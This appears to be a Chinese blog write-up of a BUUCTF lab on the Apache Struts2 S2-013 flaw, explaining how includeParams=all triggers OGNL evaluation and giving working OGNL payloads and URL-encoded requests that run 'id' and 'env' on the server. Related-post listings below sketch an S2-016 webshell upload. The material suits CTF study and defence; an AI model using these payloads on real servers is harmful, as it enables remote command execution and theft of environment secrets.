buuctf [struts2]s2-013

最新推荐文章于 2024-04-06 10:48:21 发布
最新推荐文章于 2024-04-06 10:48:21 发布
阅读量778 收藏 2
点赞数
分类专栏: buuctf real 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36241198/article/details/114866759
版权

在这里插入图片描述
漏洞简介

Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下:
none - 链接不包含请求的任意参数值(默认)
get - 链接只包含 GET 请求中的参数和其值
all - 链接包含 GET 和 POST 所有参数和其值
<s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞。

2种POC

${(#_memberAccess[“allowStaticMethodAccess”]=true,#a=@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())}

${#_memberAccess[“allowStaticMethodAccess”]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream())}

exec执行系统命令,flag在环境变量里面,构造要url编码:

link.action?a=%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27id%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23out%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23out.println(%23d)%2c%23out.close())%7d

在这里插入图片描述
link.action?a=%24%7b(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27env%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23out%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23out.println(%23d)%2c%23out.close())%7d

在这里插入图片描述

exploitsec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2远程代码执行漏洞分析(S2-013)1
K8_Struts2.3.1.4 s2-013 0day利用工具+动画
05-23
关于2010那洞 我就不说了 2011那个也不说了 (这两成功率 还是顶高的) s2-013 实战 鸡肋 (要不然这工具也不会丢出来了 最好你自己打个环境来测一下 免得你以为工具不能用) 触发条件 1 s2 架构 2 使用了s2的 a标签 3 includeParams=all <s:a includeParams="all">k8team</s:a> 在ie下看到的a标签 和普通html没啥区别 在firefox下会看到 使用了s2 a标签的链接源码是这样的 *.jsp;jsessionid inurl: *.jsp;jsessionid 能不能搞到 纯属看你人品了
Struts2 S2-013复现
ZJT6666666的博客
12-22 263
Struts2 S2-013复现
BUUCTF-Real-[struts2]s2-013
分享
02-03 445
s2-013中,因为参数的问题导致rce漏洞的出现!
[struts2]s2-013 漏洞复现
satasun的博客
12-09 565
[struts2]s2-013 环境搭建 github buuctf poc Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=a
S2-013的一次逐步复现分析
jary__D的博客
11-27 354
站在巨人的肩膀上,嚼烂了分析漏洞
【Vulfocus解题复现】Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 2666
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
Apache Struts2远程代码执行漏洞(S2-013)
weixin_47493074的博客
09-19 445
Apache Struts2(S2-013)
struts2系列-Real-BUUCTF平台
~airrudder~
04-24 3796
本篇内容 [PHP]XXE [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce 上一篇 | 目录 | 下一篇 [PHP]XXE 打开就显示phpinfo,直接搜索flag就出来了。 不知道是不是环境坏了。 [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce ...
struts2 s2-013补丁1
08-08
S2-013Struts2框架中一个重要的安全漏洞,它涉及到对用户输入的不当处理,可能导致远程代码执行(RCE)。这个漏洞主要出现在Struts2的视图层,尤其是URL重写功能。 在描述中,提到了开发者对于Struts2官方发布的...
struts2 s2-045
03-22
Struts2 S2-045 是一个著名的安全漏洞,主要影响使用Apache Struts2框架开发的Web应用程序。这个漏洞是由于Struts2的核心组件存在的一个逻辑错误,导致了远程代码执行(RCE)的可能性,这使得攻击者可以完全控制受...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
Struts2 漏洞 S2-045 修补方法 Struts2 是一个基于 Java 的 Web 应用程序框架,广泛应用于企业级应用程序中。然而,Struts2 中存在着一些漏洞,例如 S2-045 漏洞,该漏洞可能会导致严重的安全问题。今天,我们将...
Struts s2-016 s2-017 补丁
09-27
对Struts s2-016 s2-017的官方修复建议是升级struts, 但对正在运行的系统,许多依赖包会导致运行出错, 直接更改代码是更快的选择. 本补丁是针对 struts2-core-2.0.11.jar 的修改, 把文件中 bin下的文件直接copy到 web...
buuctf [struts2]s2-012
qq_1873822的博客
03-21 362
漏洞简介 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如: <package name="S2-012" extends="struts-default"> <action name="user" class="com.demo.action.UserAction"> <result name="redirect" type="redirect">/index.jsp?n
vulhub中Struts2-012 远程代码执行漏洞复现
yougexiaojiuguan的博客
04-06 313
漏洞复现过程的记录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-013(CVE-2013-1966)
qq_51577576的博客
11-24 475
Struts2标签中和都包含一个includeParams属性,其值可设置为none、get 或 all,其对应意义分别为,none:链接不包含请求的任意参数值(默认),get:链接只包含GET请求中的参数和其值,all:链接包含GET和POST所有参数和其值.用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上.这个参数会进行OGNL表达式解析,从而可以插入任意OGNL表达式导致任意代码执行
vulhub中Struts2-013/Struts2-014 远程代码执行漏洞复现
最新发布
yougexiaojiuguan的博客
04-06 542
漏洞复现过程的记录
S2-013/S2-014 远程代码执行漏洞
EC_Carrot的博客
08-09 272
漏洞简介 影响版本: 2.0.0 - 2.3.14.1 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-013/README.zh-cn.md 漏洞复现 GET传入以下Poc即可执行命令: ${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java
Struts2 S2-016上传webshell的需求分析
05-25
Struts2 S2-016漏洞是一种文件上传漏洞,攻击者可以通过该漏洞上传恶意代码(如WebShell)到目标服务器,并在服务器上执行该代码,造成严重的安全威胁。 为了成功利用该漏洞,攻击者需要满足以下条件: 1. 目标服务器上安装了Struts2框架。 2. 目标服务器上存在可以上传文件的页面。 3. 目标服务器上存在可以执行上传文件的Action。 因此,攻击者需要进行以下需求分析: 1. 了解目标服务器上是否安装了Struts2框架。 2. 扫描目标服务器,查找可以上传文件的页面。 3. 分析可上传文件的页面中文件上传的代码逻辑。 4. 查找可以执行上传文件的Action。 5. 编写恶意代码,将其伪装成图片或其他常见文件格式,以绕过上传文件类型的限制。 6. 利用漏洞上传恶意代码,并在服务器上执行该代码。 需要注意的是,利用该漏洞进行攻击可能会被追究法律责任,请勿尝试非法入侵。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值